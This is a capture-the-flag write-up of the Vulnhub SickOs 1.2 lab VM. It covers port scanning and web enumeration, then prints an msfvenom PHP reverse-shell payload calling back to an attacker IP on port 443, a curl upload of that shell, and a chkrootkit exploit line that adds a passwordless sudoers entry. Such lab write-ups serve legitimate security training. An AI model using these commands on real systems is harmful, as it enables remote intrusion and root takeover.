Another day another  CTF (capture the flag) if you got no projects better sharpen your skill playing CTF :p , this time it’s called SickOs:1.2  from Vulnhub

1. Service Discovery

We started  off using nmap to scan all tcp ports

nmap1

Two TCP Ports open 22 and 80 and  nothing interesting on SSH, Usually, I proceed to scan  UDP, but I just to lazy, i wanted to see how fast i can Finnish this .

2. Enumeration

Nothing interesting on port 22, lets jump up to see what is on port 80

2.2. Port 80 HTTP

Let’s take a look on pot 80, we start with using Nikto

nikto

Nothing special here, let’s see from the web browser

neo

All I see is the dude from matrix, alright, I thought so too Neo, next we’ll fire up the Dirbuster

dirb

I can see that there is a directory called test, lets enumerate further

curl1

Very nice, look like i can upload files to this directory,  i’ll upload a Msfvenom file, using this command :

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=443 -f raw > tai.php

Next, upload the file tai.php using curl (I love curl)

curl --upload-file tai.php http://192.168.0.106/test/tai.php -0 --http1.0

and the file is successfully uploaded

test

Do not pay attention to the other files, those are my experiments, it took me awhile to figure out that the reverse shell only work on port 443 😀

3. Exploitation

Next step is to setup a Multi/Handler Listener on metaslpoit, and click on the file

exp

We have meterpreter, we drop down into shell, but unfortunately we only have shell with limited privilege, we need to escalate our privilege to root, lets just enumerate further from here.

shell.png

We can see that the target machine is using Linux Ubuntu on 3.11 kernel, and some fancy banner, as usual at this point I upload and run  the linuxprivchecker.pycomplete result can be seen here

After spent hours  of searching exploit-db.com for vulnerability and some enumeration I found that the target machine is running chkrootkit version 0.49 which is vulnerable. After checking the scheduled corn job I can see that it run daily, next step, I run this command :

 

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

After several minutes i ran sudo su, for root privilege

screen-shot-2016-10-03-at-4-28-43-pm

and capture the flag which is located in /root directory

screen-shot-2016-10-03-at-4-30-58-pm

 

4. Conclusion

Nice  VM, I learnt some new techniques. Thanks D4rk36 and Vulnhub!

Advertisements